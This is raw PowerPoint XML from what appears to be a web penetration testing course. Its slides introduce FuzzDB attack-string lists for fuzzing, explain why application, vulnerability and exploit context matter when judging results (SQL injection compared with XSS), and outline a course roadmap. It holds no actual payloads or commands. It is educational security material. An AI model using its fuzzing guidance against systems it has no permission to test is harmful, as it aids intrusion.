            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We need a series of attack strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>To effectively fuzz an application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>FuzzDB is a project that provides these</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>http://code.google.com/p/fuzzdb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It collects various attack strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Categorizes them into files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>These files are fed into the attack tools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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Context</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64515" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Context is very important as we evaluate results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Determining false positives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We need to truly evaluate the results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Based on the input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We also need to understand what the flaw means</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>How do we determine that it exists</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>For example, PHPinfo commonly shows as SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Due to its display of database drivers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Context</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The first context is the application's</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>No application runs in a void</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Even if that is how we are asked to test it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The application's context helps us understand the risk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>What does this application do? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Where is it on the network? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Who has access to it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>By answering this context question, we can better evaluate what to test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Testing user name harvesting on a phone book is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>probably </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>not important</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38235421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Vulnerability Context</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1149568"/>
            <a:ext cx="8077200" cy="4419600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Vulnerabilities also have a context</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Where do they exist?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>First are they server or client focused?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>SQL injection is VERY different from XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Second where do they run?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Is it on a browser internal to the client or is it on a web server in the DMZ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>This context has to be considered</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>As we choose tools and techniques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2775654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Exploit Context</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1676400"/>
            <a:ext cx="8305800" cy="4419600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The exploit itself is part of the vulnerability context</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The exploit runs where the </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>vulnerability is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>We have to pay attention </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>to its execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>To ensure it runs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Server-side exploits need to </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>work within the code or query execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>SQL injection fits within an existing query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Client-side exploits depend on where they land</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Is the XSS code within HTML or another script?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="2146415"/>
            <a:ext cx="4038600" cy="2222743"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19037638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41"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1905000"/>
            <a:ext cx="8458200" cy="4419600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Attacker's View of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Recon &amp; Mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery Cont.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Capture the Flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="3670300" y="707084"/>
            <a:ext cx="1892300" cy="5846116"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1192"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 1192"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 1192"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 1192 w 1192"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="1192" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="2164"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1192" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1192" y="3984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2164"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99CCFF">
              <a:alpha val="50195"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="707084"/>
            <a:ext cx="3429000" cy="5922315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99FFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000">
                    <a:srgbClr val="000000">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Vulnerability Discovery Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Creating Custom Scripts for </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>     Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Python for Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Exercise: Python Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Vulnerabilities and Manual</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>   Verification Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Fiddler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
